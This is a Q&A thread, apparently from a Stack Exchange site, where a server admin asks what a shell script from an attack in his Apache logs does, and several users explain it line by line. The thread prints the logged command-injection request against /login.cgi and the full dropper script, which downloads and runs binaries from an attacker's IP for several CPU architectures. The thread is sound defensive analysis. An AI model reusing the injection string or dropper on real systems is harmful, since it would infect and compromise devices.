What does this bash script do? [Hack Attempt]

Question

I've been noticing on my servers apache logs, the following strange lines lately:

156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"

So I made a custom Fail2Ban filter and started banning the IPs requesting these /login.cgi URLs.

But I was curious as to what they were trying to do, so I pulled the script they're trying to execute and I can't seem to figure out what exactly it does. Something about removing arch folders in /var and /tmp?

Anyway, here it is:

#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
    do
    rm -rf $u
    cp $SHELL $u
    chmod 777 $u
    >$u
    wget http://$http_server:$http_port/$name -O -> $u
    ./$u $name
done

Related vulnerability: https://twitter.com/txalin/status/1007625620090707974?lang=en — test, Sep 08 '18 at 18:58
I just open the .sh file in a browser on my home pc and copy and pasted it in here, it never actually got on my server. — ndom91, Sep 09 '18 at 06:26
This script is a 'dropper', which is used to download the actual exploit script. This will be located at `hxxp://80.211.173.159:80/$name` where `$name` is each of the CPU architectures in `bin_names`. So 7 attack scripts will be downloaded and executed — BlueCacti, Sep 10 '18 at 10:08

l0b0 · Accepted Answer · 2018-09-08T20:51:19.727

44

Line by line:

#!/bin/sh

Establishes the sh shell, whichever that is, as the shebang line. sh%20/tmp/ks in the request overrides this, so this line is treated as a normal comment and ignored.

u="asgknskjdgn"

Declares an arbitrary name, presumably to avoid colliding with other filenames. I'm not sure why they wouldn't just use mktemp, but maybe that is not available on all platforms.

bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"

Enumerates several common CPU architectures.

http_server="80.211.173.159"
http_port=80

The server which has the exploit.

cd /tmp/||cd /var/

Tries to change directory to somewhere your web server is likely to be able to create files. I believe SELinux will help with this, by enforcing much stricter rules about what the web server can do than the file system does on its own.

for name in $bin_names
    do

For each CPU architecture…

    rm -rf $u

Removes previously tried exploit programs. Unnecessary because of the next line, so can be ignored.

    cp $SHELL $u

Copies the current shell executable (/bin/sh). Can be ignored because of the line after next.

    chmod 777 $u

Makes everyone have full access to the new file. This should have been after the wget command, which is either a sign of a shell scripting newbie or a misdirection technique.

>$u

Empties out the file. Pointless because of the next line.

    wget http://$http_server:$http_port/$name -O -> $u

Overwrites the file with the exploit script for this architecture. -O -> $u could have been written -O - > $u (the hyphen indicates that the download should be written to standard output) which is equivalent to -O $u.

    ./$u $name

Runs the exploit script with the architecture as the first argument.

done

Ends the loop.

It looks like this is a trivial exploit attempt script, trying known exploits against various CPU platforms. I do not know why it overwrites $u three times, but those operations could simply be remains from an earlier iteration of the script. Presumably that earlier version had the exploits hard coded rather than dynamically served - the former is easier but almost guarantees that the script will be less effective over time as bugs are patched.

edited Sep 08 '18 at 20:51

answered Sep 08 '18 at 09:00

l0b0

7,171
4
33
54

22

There is an advantage to explicitly rm'ing the file. If the destination already exists and is being executed right now, the kernel will not allow you to open the file for writing (-ETXTBSY). However, renaming or deleting a running program is allowed. – u1686_grawity Sep 08 '18 at 09:32
What does the `->` in the `wget` command do? Why not just `wget ... -O $u`? – RonJohn Sep 08 '18 at 20:39
1

@RonJohn read it as `- >` – cat Sep 08 '18 at 22:08
@l0b0 No, it doesn't. I meant in my comment that people could figure it out for themselves if they were curious. Sorry for starting a mess... – Nonny Moose Sep 08 '18 at 22:09
@RonJohn It's actually two separate things: `-O -`, which causes wget to write to stdout, and `>`, which begins output redirection. As for why not, the attacker appears to be inexperienced, or maybe it's for obfuscation? – Nonny Moose Sep 08 '18 at 22:10
5

With `-O->filename`, the `filename` doesn't show in the output of *ps ax*. That can be an advantage to make debugging harder. – pts Sep 09 '18 at 19:43
1

The `cp` gives you an executable file. Possibly useful if the `chmod` fails? Edit: given that [apparently](https://twitter.com/txalin/status/1007625620090707974?lang=en) this targets routers, it's quite possible that `chmod` doesn't exist. – Bob Sep 10 '18 at 02:47
The script doesn't even try to identify the CPU arch of the target, it downloads and runs all of the scripts. I wonder if running the wrong script could brick the system (unless the script itself does the checking). – BlueCacti Sep 10 '18 at 10:07
This is indeed quite amateurish. The exploit it uses is even only for specific DLINK gear, so it will only ever have the one working architecture. Of course, ugly successful hacks are still successful hacks… – w00t Sep 12 '18 at 11:59
Using > won't change the previously set permissions on the file. It looks like cp and chmod are both attempts to make the file executable, then the wget with redirection replaces the contents without changing the ownership and permissions of the file. Using wget -O filename would over-write the file and change the permissions. – Randy Orrison Sep 12 '18 at 16:39

score 12 · Answer 2 · answered Sep 08 '18 at 08:53

12

The wget is the key dangerous line.

The for name in $bin_names is working through the list of platforms and for each platform it is clearing a temporary directory, copying a shell over and then making it accessible by everyone.

It then downloads a file using wget and then executes it using the shell program it just copied over.

The script is basically attempting to download a series of executables or scripts for every platform it can and rubbing them against your system in the hope that it can further compromise your system.

answered Sep 08 '18 at 08:53

Mokubai

89,133
25
207
233

6

rubbing == running? – Barmar Sep 08 '18 at 13:45
5

@Barmar I'm sure that was intentional :P – Canadian Luke Sep 09 '18 at 16:58

What does this bash script do? [Hack Attempt]

2 Answers2